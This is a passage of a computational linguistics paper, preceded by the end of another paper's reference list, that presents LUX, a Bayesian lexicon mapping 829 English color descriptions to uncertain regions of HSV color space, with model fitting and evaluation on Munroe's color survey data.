Computational Linguistics. Oskar Kohonen, Sami Virpioja, Laura Leppänen, and Krista Lagus. 2010b. Semi-supervised extensions to morfessor baseline. In Proceedings of the Morpho Challenge 2010 Workshop, pages 30–34. Aalto Univer- sity School of Science and Technology. Yoong Keok Lee, Aria Haghighi, and Regina Barzilay. 2011. Modeling syntactic context improves morpho- logical segmentation. In Proceedings of CoNLL, pages 1–9. Association for Computational Linguistics. Percy Liang, Hal Daumé, III, and Dan Klein. 2008. Struc- ture compilation: trading structure for features. In Proceedings of ICML, pages 592–599. Association for Computing Machinery. Constantine Lignos. 2010. Learning from Unseen Data. In Mikko Kurimo, Sami Virpioja, and Ville T. Turunen, editors, Proceedings of the Morpho Challenge 2010 Workshop, pages 35–38. Aalto University School of Science and Technology. Jim Pitman and Marc Yor. 1997. The two-parameter Poisson-Dirichlet distribution derived from a stable sub- ordinator. Annals of Probability, 25(2):855–900. Hoifung Poon, Colin Cherry, and Kristina Toutanova. 2009. Unsupervised morphological segmentation with log-linear models. In Proceedings of NAACL, pages 209–217. Association for Computational Linguistics. Benjamin Snyder and Regina Barzilay. 2008. Unsuper- vised multilingual learning for morphological segmen- tation. In Proceedings of ACL, pages 737–745. Associ- ation for Computational Linguistics. Sebastian Spiegler and Christian Monson. 2010. Emma: A novel evaluation metric for morphological analysis. In Proceedings of COLING, pages 1029–1037. Associ- ation for Computational Linguistics. Sze-Meng Jojo Wong, Mark Dras, and Mark Johnson. 2012. Exploring adaptor grammars for native language identification. In Proceedings of EMNLP, pages 699– 709. Association for Computational Linguistics. 266 work_gk6uak5jyfctxoj4richmjmlqm ---- A Bayesian Model of Grounded Color Semantics Brian McMahan Rutgers University brian.mcmahan@rutgers.edu Matthew Stone Rutgers University matthew.stone@rutgers.edu Abstract Natural language meanings allow speakers to encode important real-world distinctions, but corpora of grounded language use also re- veal that speakers categorize the world in different ways and describe situations with different terminology. To learn meanings from data, we therefore need to link underly- ing representations of meaning to models of speaker judgment and speaker choice. This paper describes a new approach to this prob- lem: we model variability through uncertainty in categorization boundaries and distributions over preferred vocabulary. We apply the ap- proach to a large data set of color descrip- tions, where statistical evaluation documents its accuracy. The results are available as a Lexicon of Uncertain Color Standards (LUX), which supports future efforts in grounded lan- guage understanding and generation by prob- abilistically mapping 829 English color de- scriptions to potentially context-sensitive re- gions in HSV color space. 1 Introduction To ground natural language semantics in real-world data at large scale requires researchers to confront the vocabulary problem (Furnas et al., 1987). Much of what people say falls in a long tail of increas- ingly infrequent and specialized items. Moreover, the choice of how to categorize and describe real- world data varies across people. We can’t account for this complexity by deriving one definitive map- ping between words and the world. We see this complexity already in free text de- scriptions of color patches. English has fewer than Hue 0 1 2 3 4 5 6 En tr op y (b its ) Figure 1: A visualization of the variability of the de- scriptions used to name colors within small bins of color space. For each Hue value, the entropy values for each bin along the Saturation and Value dimensions are grouped and plotted as box plots. The dotted line cor- responds to a random choice out of fourteen items and to the perplexity of a histogram model trained on the corpus. a dozen basic color words (Berlin, 1991), but peo- ple’s descriptions of colors are much more variable than this would suggest. Measured on the corpus described in Section 4.1, there’s an average of 3.845 bits of information in a color description given the color it describes—comparable to rolling a 14-sided die. Figure 1 summarizes the data and plots the en- tropy of descriptions encountered within small bins of color space. The bins are aggregated over the Sat- uration and Value dimensions and indexed on the x- axis by the Hue dimension. There’s little reason to think that this variability conceals consistent mean- ings. In formal semantics, one of the hallmarks of vague language is that speakers can make it more precise in alternative, incompatible ways (Barker, 2002). We see this in practice as well, for exam- ple with the image of Figure 2, where subjects com- Figure 2: Image by flickr user Joanne Bacon (jlbacon) from the data set of Young et al. (2014), whose subjects describe these dogs as a brown dog and a tan one or a tan dog and a white one. prehensibly describe either of two dogs as the tan one. Systems that robustly understand or generate descriptions of colors in situated dialogue need mod- els of meaning that capture this variability. This paper makes two key contributions towards this challenge. First, we present a methodology to infer a corpus-based model of meaning that ac- counts for possible differences in word usage across different speakers. As we explain in Section 2, our approach differs from the typical perspective in grounded semantics (Tellex et al., 2011a; Matuszek et al., 2012; Krishnamurthy and Kollar, 2013), where a meaning is reduced to a single classifier that collapses patterns of variation. Instead, our model allows for variability in meaning by positing uncer- tainty in classification boundaries that can get re- solved when a speaker chooses to use a word on a specific occasion. We explain the model and its the- oretical rationale in Section 3. Second, we develop and release a Lexicon of Uncertain Color Standards (LUX) by applying our methodology to color descriptions. LUX is an inter- pretation of 829 distinct English color descriptions as distributions over regions of the Hue–Saturation– Value color space that describe their possible mean- ings. As we describe in Section 4, the model is trained by machine learning methods from a subset of Randall Munroe’s 2010 publicly-available cor- pus of 3.4 million crowdsourced free-text descrip- tions of color patches (Munroe, 2010). Data, models and visualization software are available at http: //mcmahan.io/lux/. Statistical evaluation of our model against two alternative approaches documents its effectiveness. The model makes better quantitative predictions than a brute-force memorization model; it seems to generalize to unseen data in more meaningful ways. At the same time, our meanings work as well as special-purpose models to explain speaker choice, even though our model supports diverse other rea- soning. See Section 5. We see color as the first of many applications of our methodology, and are optimistic about learn- ing vague meanings for other continuous domains as quantity, space, and time. At the same time, the methodology opens up new prospects for re- search on negotiating meaning interactively (Lars- son, 2013) with principled representations and with broad coverage. In fact, many practical situated dia- logue systems already identify unfamiliar objects by color. We expect that LUX will provide a broadly useful resource to extend the range of descriptions such systems can generate and understand. 2 Related Work Grounded semantics is the task of mapping rep- resentations of linguistic meaning to the physical world, whether by perceptual mechanisms (Har- nad, 1990) or with the assistance of social inter- action (DeVault et al., 2006). In this paper, we are particularly concerned with grounding the mean- ings of primitive vocabulary. However, the ulti- mate test of grounded semantics—whether it is un- derstanding commands (Winograd, 1970; Tellex et al., 2011b), describing states of the world (Chen and Mooney, 2008), or identifying objects (Matuszek et al., 2012; Krishnamurthy and Kollar, 2013; Dawson et al., 2013)—is the ability to interpret or generate utterances using lexical and compositional seman- tics so as to evoke appropriate real-world referents. Grounded semantics therefore involves more than just quantifying the associations between words and perceptual representations, as Chuang et al. (2008) and Heer and Stone (2012) do for color. Grounded semantics involves interpreting semantic primitives in terms of composable categories that let systems discriminate between cases where a word applies and cases where the word does not apply. (Our eval- uation compares models of grounded semantics to more direct models of word–world associations.) Previous research has modeled these categories as http://mcmahan.io/lux/ http://mcmahan.io/lux/ regions of suitable perceptual feature spaces. Re- searchers have explored explicit spaces of high-level perceptual attributes (Farhadi et al., 2009; Silberer et al., 2013), approximations to such spaces (Ma- tuszek et al., 2012), or low-level feature spaces such as Bag of Visual Words (Bruni et al., 2012) or Histogram of Gradients (Krishnamurthy and Kollar, 2013). We specifically follow Gärdenfors (2000) and Jäger (2010) in assuming that color categories are convex regions in an underlying color space, and are not just determined by prototypical color values, such as in Andreas and Klein (2014). However, unlike previous grounded semantics, we do not assume that words name categories un- equivocally. Speakers may vary in how they inter- pret a word, so we treat the link between words and categories probabilistically. The difference makes training our model more indirect than previous ap- proaches to grounded meaning. In particular, our model introduces a new layer of uncertainty that de- scribes what category the speaker uses. Similar kinds of uncertainty can be found in Bayesian models of speaker strategy, such as that of Smith et al. (2013). However, this research has assumed that speakers aim to be as informative as possible. We have no evidence that our speakers do that. We assume only that speakers’ utterances are reliable and mirror prevailing usage. Prior work by cognitive scientists has studied color terms extensively, but focused on basic ones— monolexemic, top-level color words with general application and high frequency in a language (Kay et al., 2009; Lammens, 1994). These color categories seem to shape people’s expectations and memory for colors (Persaud and Hemmer, 2014), and pat- terns of color naming can therefore enhance soft- ware for helping people organize and interact with color (Chuang et al., 2008; Heer and Stone, 2012). Moreover, crosslinguistic evidence suggests that the human perceptual system places strong biases on the meanings of the basic color terms (Regier et al., 2005), perhaps because basic terms must partition the perceptual space in an efficient way (Regier et al., 2007). We depart from research on basic color naming in considering a much wider range of terms, much like Andreas and Klein (2014). We consider subordinate, non-basic terms like beige or lavender; modified colors like light blue or bright green; and named subcategories like olive green, navy blue or brick red. In order to use semantic primitives for under- standing, it’s necessary to combine them into an integrated sentence-level representation: this is the problem of semantic parsing. Semantic parsers can be built by hand (Winograd, 1970), induced through inductive logic programming (Zelle and Mooney, 1996), or treated as a structured classification prob- lem (Zettlemoyer and Collins, 2005). Once a suit- able logical form is derived, interpretation typically involves a recursive process of finding referents that fit lexical categories and relationships (Mavridis and Roy, 2006; Tellex et al., 2011a). While this pa- per does not explicitly address how our meanings might be used in conjunction with such techniques, we see no fundamental obstacle to doing so—for ex- ample, by resolving references probabilistically and marginalizing over uncertainty in meaning. 3 Using Vague Color Terms: A Model Our model involves two significant innovations over previous approaches to grounded meaning. The first is to capture the vagueness and flexibility of grounded meaning with semantic representations that treat meaning as uncertain. We represent the semantics of a color description with a distribu- tion over color categories, which weights possible meanings by the relative likelihood of a speaker us- ing this meaning on any particular occasion. For example, speakers might associate yellowish green with a range of possible meanings, differing in how far the color category extends into green hues. By representing uncertainty about meaning, our model makes room to capture variability in language use. For example, it implicitly quantifies how likely speakers are to use words differently, as with the two interpretations of tan in Figure 2. Our second contribution is our simple model of the relationship between semantics and pragmatics. We assume that speakers’ choices mirror established patterns. In particular, the model learns a measure of availability for each color term that tracks how frequently speakers tend to use it when it is appli- cable. For example, although the expressions yel- lowish green and chartreuse are associated with very similar color categories, people say yellowish green much more often: it has a higher availability. Empir- ically, we find few terms with high availability and a long tail of terms with lower availabilities. We as- sume speakers simply sample applicable terms from this distribution, which predicts the long tail of ob- served responses. Mathematically, we develop our approach through the rational analysis methodology for explaining human behavior proposed by Anderson (1991), along with methodological insights from the linguistics and philosophy of vagueness. In the remainder of this section, we explain the theoretical antecedents in perceptual science, linguistics and cognitive modeling that inform our approach. 3.1 Color Categories Color can be defined as sensations by which the per- ceptual system tracks the diffuse reflectance of ob- jects, despite variability, uncertainty and ambiguity in the visual input. Red, green, and blue cones in the retina allow the visual system to coarsely es- timate frequency bands in the spectrum of incom- ing light. Cameras and screens that use the red– green–blue (RGB) color space are designed roughly to correspond to these responses. However, colors in the visual system summarize spectral profiles rather than mere wavelengths of light. For example, we see colors like cyan (green plus blue without red), ma- genta (blue plus red without green) and yellow (red plus green without blue) as intermediate saturated colors between the familiar primaries. This natu- rally leads to a wheel of hues describing the relative prominence of different spectral components along a continuum. Fairchild (2013) provides an overview of color appearance. To capture this variation, we’ll work in the sim- ple hue–saturation–value (HSV) color space that’s common in computer graphics and color picker user interfaces (Hughes et al., 2013) and implemented in python’s native colorsys package. This coordinate system represents colors with three distinct qualita- tive dimensions: Hue (H) represents changes in tint around a color wheel, Saturation (S) represents the relative proportion of color versus gray, and Value (V) represents the location on the white–black con- tinuum. We will associate color categories with rect- angular box-shaped regions in HSV space. More sophisticated color spaces have been developed to describe the psychophysics of color more precisely, but they depend on the photometric illumination and other aspects of the viewing context that were not controlled in the collection of the data we are using (Fairchild, 2013). 3.2 Semantic Representation Our assumption is that color terms are associated probabilistically with color categories. We illustrate the idea for the color label yellowish-green through the plot in Figure 3. The plot shows variation in use of the term across the Hue dimension: the bar graph is a scaled histogram of the responses in the data we use. There is a range of colors where people use yel- lowish green often, surrounded by borderline cases where it becomes increasingly infrequent. Hue µLower µUpper 0.2 0.4 0.6 0.8 1.0 P ro ba bi li ty τLower τUpper φHueY ellowishGreen Yellowish Green data Figure 3: The LUX model for “yellowish green” on the Hue axis plotted against the scaled histogram of the re- sponses in the data. The φ curve represents the likeli- hood of “yellowish green” for different Hue values. The τ curves represent possible boundaries. We represent this variability by assuming that the boundaries that delimit the color are uncertain. In any utterance, yellowish green fits only those Hue values that are above a minimum threshold τLower and below a maximum threshold τUpper. However, it is uncertain which thresholds a speaker will use. The model describes this variability with probabil- ity density functions. They are shown for yellowish green in Figure 3 as the τ distributions. The figure shows that there is a central range of hues, between the τ distributions, that is definitely yellowish green. The τ distributions peak at the most likely bound- aries for yellowish green, encompassing a broad re- gion that’s frequently called yellowish green. Fur- ther away, threshold values and yellowish green ut- terances alike become rapidly less likely. Our representation is motivated by Barker (2002) and Lassiter (2009), who show how sets of possi- ble thresholds1 can account for many of our intu- itions about the use of vague language. Their analy- sis invites us to capture semantic variability through two geometric constructs. First, there is a certain interval, parameterized by two points, µLower and µUpper, within which a color description definitely applies. Outside this interval are regions of bor- derline cases, delimited by probabilistically-varying thresholds τLower and τUpper, where the color de- scription sometimes applies. We represent the po- sition of the threshold with a Γ(α,β) distribution, a standard statistical tool to model processes that start, continue indefinitely, and stop, like waiting times.2 We can determine a likelihood that a description fits a color by marginalizing over the thresholds: this gives the black curve visualized in Figure 3. As we describe in Section 3.3, we can use this to account for the graded responses from subjects that we ob- serve near color boundaries. We summarize with a formal definition of our se- mantic representation. Let X be the 3D space of HSV colors and let x ∈ X be a measured color value. Each color label k has definite boundaries, µLower and µUpper in X, delimiting a box of HSV color space. Surrounding the definite region are regions of uncertainty: the set of possible bound- aries beyond µ. These are represented by probabil- ity distributions over lower and upper threshold val- ues in each dimension. We’ll represent these thresh- olds by τj,dk where k ∈ K indexes the color label, j ∈ {Lower/L, Upper/U} indexes the boundary, and d ∈ {H, S, V} indexes color components. We assume the thresholds are distributed as follows: τ Lower,d k ∼ µ Lower,d k − Γ(α Lower,d k ,β Lower,d k ) τ Upper,d k ∼ µ Upper,d k + Γ(α Upper,d k ,β Upper,d k ) (1) The meaning of a color term is thus a “blurry box”. The distribution lets us determine the probability of 1We treat the terms “boundary”, “threshold”, and “standard” to be synonymous, but useful in different contexts. 2Γ distributions rise quickly away from the origin point, then trail off from the peak in an open-ended exponential de- cay. One intuition for applying them in this case is Graff Fara’s (2000) suggestion that a particular categorization decision in- volves waiting to find a natural break among salient colors. However, we choose them for mathematical convenience rather than psychological or linguistic considerations. Figure 4: The Rational Observer observes a color patch, x. The applicability of each label (ktrue) is based upon the label parameters (α,β,µ) and x. The label (ksaid) is sampled proportional to the applicability and a back- ground weight: how often a label is said when it applies. a point x falling into the color category k as in Eq. 2. We also use the compact notation in Eq. 3. P(τ Lower, H k < x H < τ Upper, H k )× P(τ Lower, S k < x S < τ Upper, S k )× P(τ Lower, V k < x V < τ Upper, V k ) (2) = ∏ d P(τ L,d k < x d i < τ U,d k ) (3) 3.3 Rational Observer Model Our goal is to learn probabilistic representations of the meanings of color terms from subjects’ re- sponses. To do this, we need not only a framework for representing colors but also a model of how sub- jects choose color terms. Inspired by rational anal- ysis (Anderson, 1991), we assume that speakers’ choices match their communicative goals and their semantic knowledge. We leverage this assumption to derive a Bayes Rational Observer model linking semantics to observed color descriptions. The graphical model in Figure 4 formalizes our approach. We start from an observed color patch, x. The Rational Observer uses the τ-distributions for each color description k to determine the likelihood that the speaker judges k applicable. As defined in Eq. 3, the likelihood is the subset of possible bound- aries which contain the target color value. Normally, many descriptions will be applicable. Which the speaker chooses depends further on the availabil- ity of the label—a background measure of how fre- quently a label is chosen when it’s applicable. In- tuitively, availability creates a bias for easy descrip- tions, capturing how natural or ordinary a descrip- tion is in language use, how easily it springs to mind or how easily it is understood. We formalize this as a generative model. As we explain in Section 4, we infer the parameters from our data. In Eq. 4, we consider the conditional dis- tribution of a subject observing a color patch given HSV value x and labeling it k: (4)P(ksaid,ktrue|x) = P(ksaid|ktrue)P(ktrue|x) In this equation, ksaid is the event that the subject responds to x with label k and ktrue is the event that the subject judges k true of the HSV value x. The two factors of Eq. 4 are respectively the availability and applicability of the color label. Availability: The prior P(ksaid|ktrue) quantifies the rate at which label k is used when it applies. We refer to this quantity as the availability and denote it as αk. Availability captures the observed bias for frequent color terms. When multiple color labels fit a color value, those with higher availability will be used more often, but those with lower availability will still get used. This effect is partially responsible for the long tail of subjects’ responses. Applicability: The second factor, P(ktrue|x), is the probability that k is true of, or applies to, the color value x. We calculate the applicability by marginalizing over all possible thresholds as in Eq. 3. In other words, we calculate the probabil- ity mass of the boundaries which allow for this de- scription to apply. We treat each applicability judg- ment as independent of others. This implies that the relative frequency at which we see a color descrip- tion used is directly proportional to the proportion of boundaries which license it. For clearer notation and parameter estimation, we track thresholds with a piecewise function φdk(x d) as in Eq. 5 and Figure 3. φdk(x d) =   P(xd > τ L,d k ), x d ≤ µL,dk P(xd < τ U,d k ), x d ≥ µU,dk 1, otherwise (5) Finally, Eq. 6 rewrites Eq. 4 to make the applica- bility and availability explicit. The model treats this equation as the probability of success for a Bernoulli trial and the data as sampled from Categorical dis- tributions formed by the set of K Bernoulli random variables. This is discussed further in Section 4.2. (6)P(ksaid,ktrue|x) = αk ∏ d φdk(x d) 4 Learning Experiment We worked with Randall Munroe’s crowdsourced corpus of color judgments, and fit the model us- ing the Metropolis-Hastings Markov Chain Monte Carlo, a Gaussian random walk optimization method. This form of approximate Bayesian infer- ence is described in Section 4.2. 4.1 Munroe Color Corpus In 2010, Munroe elicited descriptions of color patches over the web. His platform asked users for background information such as sex, color- blindness, and monitor type, then presented color patches and let the user freely name them. The setup didn’t ensure that users see controlled colors or that users’ responses are reliable, but the experiment col- lected over 3.4M items pairing RGB values with text descriptions. Munroe’s methodology, data and re- sults are published online (Munroe, 2010).3 Munroe summarizes his results with 954 idealized colors—RGB values that best exemplify high fre- quency color labels. In effect, Munroe’s summary offers a prototype theory of color vocabulary, like that of Andreas and Klein (2014). An alternative theory, which we explore, is that variability in the applicability of labels is an important part of peo- ple’s knowledge of color semantics. We compare the two theories explicitly in Section 5. Our experiments focus on a subset of Munroe’s data comprising 2,176,417 data points and 829 color descriptions, divided into a training set of 70%, a 5% development set, and a held-out test set of 25%. To minimize variability in language use, we selected data from users who self-report as non- colorblind English speakers. This accounts for 2.5M of Munroe’s 3.4M items. To get our sub- set, we further restrict attention to labels used 100 times or more, to ensure that there’s substantial ev- idence of each term’s breadth of applicability. We hand curated the responses to correct some mi- nor spelling variations involving a single-character 3http://blog.xkcd.com/2010/05/03/ color-survey-results/ http://blog.xkcd.com/2010/05/03/color-survey-results/ http://blog.xkcd.com/2010/05/03/color-survey-results/ change (“yellow green” vs “yellow-green”; “fuch- sia” vs “fuschia”, “fushia”, “fuchia”, and “fucsia”) and to remove high-frequency spam labels. We are left with 829 color labels that fit these restrictions. Finally, we used python’s colorsys to convert from RGB to HSV, where we hypothesize color meanings can be represented more simply. We include these data sets with our release at http://mcmahan. io/lux/ so our results can be replicated. 4.2 Fitting the Model Parameters Optimization of the model’s parameters is framed in a Bayesian framework and interpreted as maximiz- ing the likelihood of the data given the parameters. We fit each label and each dimension independently. The data on each dimension is binned, as in Figure 3, so we have Binomial random variables for each bin. For each color label k, the probability of success is based on the model’s parameters. Non-k data in the bin are observations of failure. This gives Eq. 7: P(ndi,k|n d i ,Z d k,φk) ∼ Bin(n d i ,Z d kφ d k(i)) (7) Here ndi is the number of data points in bin i on di- mension d, ndi,k is the number of data points for la- bel k in bin i on dimension d, and Zdk is a normal- ization constant, implicitly reflecting both the avail- ability αk and the distribution of responses of the term across other color dimensions. The optimiza- tion process is a parameter search method which uses as an objective function the probability of ndi,k in Eq. 7 for all d,i, and k. Parameter Search: We adopt a Bayesian coor- dinate descent which sequentially samples the cer- tain region parameter, µ, and the shape and rate pa- rameters (α and β) of the Γ distributions for all d and k independently. It also samples the estimated normalization constant, ZdK . More specifically, the sampling is done using Metropolis-Hastings Markov Chain Monte Carlo (Metropolis et al., 1953; Chib and Greenberg, 1995), which performs a Gaussian random walk on the parameters4. For each sample, the likelihood of the data, derived from the Bino- mial variables, is compared for the new and old set 4We set the standard deviation of the sampling Gaussian to be 1 for each µ and 0.3 for each α and β after finding experi- mentally that it led to effective parameter search (Gelman et al., 1996). of parameters. The new parameters are accepted proportionally to the ratio of the two likelihoods. Multiple chains were run using 4 different bin sizes per dimension and monitored for convergence using the generalized Gelman-Rubin diagnostic method (Brooks and Gelman, 1998). This methodology leaves us not only with the Monte Carlo estimate of the expected value for each parameter, but also a sampling distribution that quantifies the uncertainty in the parameters themselves. Availability: Availability is estimated as the ratio of the observed frequency of a label to its expected frequency given the parameters which define its dis- tribution. The expected frequency, a marginalization of the color space for the φ function, is calculated using the midpoint integration approximation. (8) αk = P(ksaid,ktrue) P(ktrue) = count(k)/N∫ x P(ktrue|x)P(x) 5 Model Evaluation LUX explains Munroe’s data via speakers’ rational use of probabilistic meanings, represented as sim- ple “blurry boxes”. In this section, we assess the effectiveness of this explanation. We anticipate two arguments against our model: first, that the represen- tation is too simple; second, that factoring speakers’ choices through a model of meaning is too cumber- some. We rebut these arguments by providing met- rics and results that suggest that LUX escapes these objections and captures almost all of the structure in subjects’ responses. 5.1 Alternative Models To test LUX’s representations, we built a brute-force histogram model (HM) that discretizes HSV space and tracks frequency distributions of labels directly in each discretized bin. Similar histogram models have been developed by Chuang et al. (2008) and (Heer and Stone, 2012) to build interfaces for inter- acting with color that are informed by human cat- egorization and naming. More precisely, our HM uses a linear interpolation method (Chen and Good- man, 1996) to combine three histograms of various http://mcmahan.io/lux/ http://mcmahan.io/lux/ granularity.5 This amounts to predicting responses by querying the training data. HM has the potential to expose whether LUX is missing important fea- tures of the distribution of color descriptions. We also built a direct model of subjects’ choices of color terms. Instead of appealing to the applica- bility and availability of a color label, it works with the observed frequency of a color label and a Gaus- sian model of the probability of a color value for each label, as in Eq. 9: (9)P(ksaid,ktrue|x) ∝P(x|ktrue)P(ksaid,ktrue) This Gaussian model (GM) generalizes Munroe’s pairing of labels with prototypical colors: P(x|ktrue) is a Gaussian with diagonal covari- ance, so it associates each color term with a mean HSV value and with variances in each dimension that determine a label-specific distance metric. GM predicts speaker choice by weighting these distances probabilistically against the priors. GM completely sidesteps the need to model meaning categorically. It therefore has the potential to expose whether our assumptions about semantic representations and speaker choices hinder LUX’s performance. 5.2 Evaluation Metrics We evaluate the models using two classes of met- rics on a held-out test set consisting of 25% of the corpus. The first type is based upon the posterior distribution over labels and the ranked position of subjects’ actual labels of color values. The second type is based upon the log likelihood of the models, which quantifies model fit. 5.2.1 Decision-Based Metrics To answer how accurate a model’s predictions are, we can locate subjects’ responses in the weighted rankings computed by the models. The TOPK Measures: Each model provides a posterior distribution over the possible labels. The most likely label of this posterior is the maximum likelihood estimate (MLE). We track how often the MLE color label is what the user actually said as 5Specifically, the histograms are of size (90,10,10), (45,5,5), and (1,1,1) across Hue, Saturation, and Value with interpolation weights of 0.322, 0.643, and 0.035 respectively. These parame- ters were determined by taking the training set as 5-fold valida- tion sets. the TOP1 measure. For the Histogram Model, the TOP1 approximates the most frequent label ob- served in the data for a color value. We also measure how often the correct label appears in the first 5 and 10 most likely labels. These are denoted TOP5 and TOP10 respectively. 5.2.2 Likelihood-Based Metrics We can also measure how well a model explains speaker choice using the log likelihood of the labels given the model and the color values, denoted as LLV (M). This is calculated using Eq. 10 across all N data points in the held-out test set. LLV (M) is used when computing perplexity and Aikake In- formation Criterion (AIC). We report all measures in bits. LLV (M) = log2 PM (K true,Ksaid|X) = ∑ i log2 PM (k true i ,k said i |xi) (10) A more general measure of model fit is the log like- lihood of the color values and their labels jointly across the training set, LL(V ), given the model. It is defined and calculated analogously. Perplexity Perplexity has been used in past re- search to measure the performance of statistical lan- guage models (Jelinek et al., 1977; Brown et al., 1992). Lower perplexity means that the model is less surprised by the data and so describes it more pre- cisely. We use it here to measure how well a model encodes the regularities in color descriptions. Akaike Information Criterion: AIC is derived from information theory (Akaike, 1974) and bal- ances the model’s fit to the data with the complexity of the model by penalizing a larger number of pa- rameters. The intuition is that a smaller AIC indi- cates a better balance of parameters and model fit. 5.3 Evaluation Results Table 1 summarizes the decision-based evalua- tion results.6 We see little penalty for LUX and 6There is a caveat to these performance measures. All of the reported numbers are for the final data subset which we discuss in Section 4.1. We choose to use a subset which did not include color labels that had less than 100 occurrences. In the English- speaking and American-citizenship subset, the rare description tail accounts for 13% of the data—Roughly one third of the tail data is unique descriptions. If the tail represents real world TOP1 TOP5 TOP10 LUX 39.55% 69.80% 80.46% HM 39.40% 71.89% 82.53% GM 39.05% 69.25% 79.99% Table 1: Decision-based results. The percentage of cor- rect responses of 544,764 test-set data points are shown. −LL −LLV AIC Perp LUX 1.13*107 2.05*106 4.13*106 13.61 HM 1.13*107 2.09*106 4.82*106 14.41 GM 1.34*107 2.08*106 4.17*106 14.14 Table 2: Likelihood-based evaluation results: negative log likelihood of the data, negative log likelihood of labels given points, number of parameters, Akaike In- formation Criterion and perplexity of labels given color values. Parameter counts for AIC are 15751 for LUX, 315669 for HM and 5803 for GM. GM’s constrained frameworks for modeling choices. However, the differences in the table, though nu- merically small, are significant (by Binomial test) at p < .02 or less. In particular, the fact that LUX wins TOP1 hints that its representations enable bet- ter generalization than HM or GM. The success of HM at TOP5 and TOP10, meanwhile, suggests that some qualitative aspects of people’s use of color words do escape the strong assumptions of LUX and GM—a point we return to below. At the same time, we draw a general lesson from the overall patterns of results in Table 1. Language users must be quite uncertain about how speakers will describe colors. Speakers do not seem to choose the most likely color label in a majority of responses; their behavior shows a long tail. These results are in line with the probabilistic models of meaning and speaker choice we have developed. Table 2 summarizes the likelihood based metrics. GM’s estimates don’t fit the distribution of the test data as a whole: GM is a good model of what labels speakers give but not a good model of the points that get particular labels. By contrast, LUX tops out ev- ery row in the table. HM is flexible enough in prin- ciple to mirror LUX’s predictions; HM must suffer circumstances, our model is only applicable 87% of the time, and thus the performance metrics should be scaled down. We do not explicitly report the scaled numbers. from sparse data, given its vast number of parame- ters. By contrast, LUX is able to capture the dis- tributions of speaker responses in deeper and more flexible ways by using semantics as an abstraction. Our analysis of patterns of error in LUX sug- gests that LUX would best improved by more faith- ful models of linguistic meaning, rather than more elaborate models of subjects’ choices or more pow- erful learning methods. For one thing, neither LUX nor the simple prototype model captures ambiguity, which sometimes arises in Munroe’s data. An exam- ple is the color label melon, which has a multimodal distribution in the reddish-orange and green areas of color space shown in Figure 5—most likely corre- sponding to people thinking about the distinct col- ors of the flesh of watermelon, cantaloupe and hon- eydew. Interestingly, our model captures the more common usage. A different modeling challenge is illustrated by the behavior of greenish in Figure 6. Greenish seems to be an exception to the general assumption that color terms label convex categories. Actually, green- ish seems to fit the boundary of green—the areas that are not definitely green but not definitely not green. (Linguists often appeal to such concepts in the liter- ature on vagueness.) This is not a convex area so, not surprisingly, our model finds a poor match. Ad- ditional research is needed to understand when it’s appropriate to give meanings more complex repre- sentations and how they can be learned. 6 Discussion and Conclusion Natural language color descriptions provide an ex- pressive, precise but open-ended vocabulary to char- acterize real-world objects. This paper documents Hue 0.0 0.2 0.4 0.6 0.8 1.0 P ro ba bi li ty φHueMelon Melon data Figure 5: For the Hue dimension, the data for “melon” is plotted against the LUX model’s φ curve. Hue µLower µUpper 0.0 0.2 0.4 0.6 0.8 1.0 P ro ba bi li ty τLower τUpper 0.000 0.001 0.002 0.003 0.004 0.005 φHueGreenish Greenish data Figure 6: For the Hue dimension, the data for “greenish” is plotted against the LUX model’s φ curve. and releases Lexicon of Uncertain Color Standards (LUX), which provides semantic representations of 829 English color labels, derived from a large cor- pus of attested descriptions. Our evaluation shows that LUX provides a precise description of speak- ers’ free-text labels of color patches. Our expec- tation therefore is that LUX will serve as a useful resource for building systems for situated language understanding and generation that need to describe colors to English-speaking users. Our work in LUX has built closely on linguis- tic approaches to color meaning and psychological approaches to modeling experimental subjects. Be- cause LUX bridges linguistic theory, psychologi- cal data, and system building, LUX also affords a unique set of resources for future research at the in- tersection of semantics and pragmatics of dialogue. For example, our work explains subjects’ deci- sions as a straightforward reflection of their com- municative goals in a probabilistic setting. Our measures of availability and applicability can be seen as offering computational interpretations of the Gricean Maxims of Manner and Quality (Grice, 1975). However, these particular interpretations don’t give rise to implicatures on our model— largely because our Rational Observer is so inclusive and variable in the descriptions it offers. To show this, we can analyze what an idealized hearer learns about an underlying color x when the speaker uses a color term k: this is P(x|ksaid). The model predic- tions are formalized in Eq. 11. P(x|ksaid) = P(x|ksaid,ktrue) = P(ksaid,ktrue|x)P(x) P(ksaid,ktrue) = P(ksaid|ktrue)P(ktrue|x)P(x) P(ksaid|ktrue)P(ktrue) = αkP(k true|x)P(x) αkP(k true) = P(x|ktrue) (11) We apply Bayes’s rule, exploiting our model as- sumption that the speaker says k only when the speaker first judges that k is true. Our model also tells us that, given that k is true, the speaker’s choice of whether to say k depends only on the availabil- ity αk of the term k. Simplifying, we find that the pragmatic posterior—what we think the speaker was looking at when she said this word—coincides with the semantic posterior—what we think the word is true of. Intuitively, the hearer knows that the term is true because the speaker has used the word, indepen- dent of the color x the speaker is describing. Sim- ilarly, in our model of speaker choice, the speaker does not take x into account in choosing one of the applicable words to say (one way the speaker could do this, for example, would be to prefer terms that were more informative about the target color x). In- stead, the speaker simply samples from the candi- dates. That’s why the speaker’s choice reveals only what the semantics says about x. Technically, this makes semantics a Nash equi- librium, where the information the hearer recov- ers from an utterance is exactly the information the speaker intends to express—in keeping with a longstanding tradition in the philosophy of language (Lewis, 1969; Cumming, 2013). By contrast, re- searchers such as Smith et al. (2013) adopt broadly similar formal assumptions but predict asymme- tries where sophisticated listeners can second-guess naive speakers’ choices and recover “extra” infor- mation that the speaker has revealed incidentally and unintentionally. The difference between this ap- proach and ours eventually leads to a difference in the priors over utterances, but it’s best explained through the different utilities that motivate speak- ers’ different choices in the first place. Smith et al. (2013) assume speakers want to be informative; we assume they want to fit in. The empirical success of our approach on Munroe’s data motivates a larger project to elicit data that can explicitly probe sub- jects’ communicative goals in relation to semantic coordination. Meanwhile, our work formalizes probabilistic theories of vagueness with new scale and preci- sion. These naturally suggest that we test predictions about the dynamics of conversation drawn from the semantic literature on vagueness. For example, in hearing a description for an object, we come to know more about the standards governing the applicability of the description. This is outlined by Barker (2002) as having a meta-semantic effect on the common ground among interlocutors. For example, hearing a yellow-green object called yellowish green should make objects in the same color range more likely to be referred to as yellowish green. We could use LUX straightforwardly to represent such conceptual pacts (Brennan and Clark, 1996) via a posterior over threshold parameters. It’s natural to look for empir- ical evidence to assess the effectiveness of such rep- resentations of dependent context. A particularly important case involves descrip- tive material that distinguishes a target referent from salient alternatives, as in the understanding or gen- 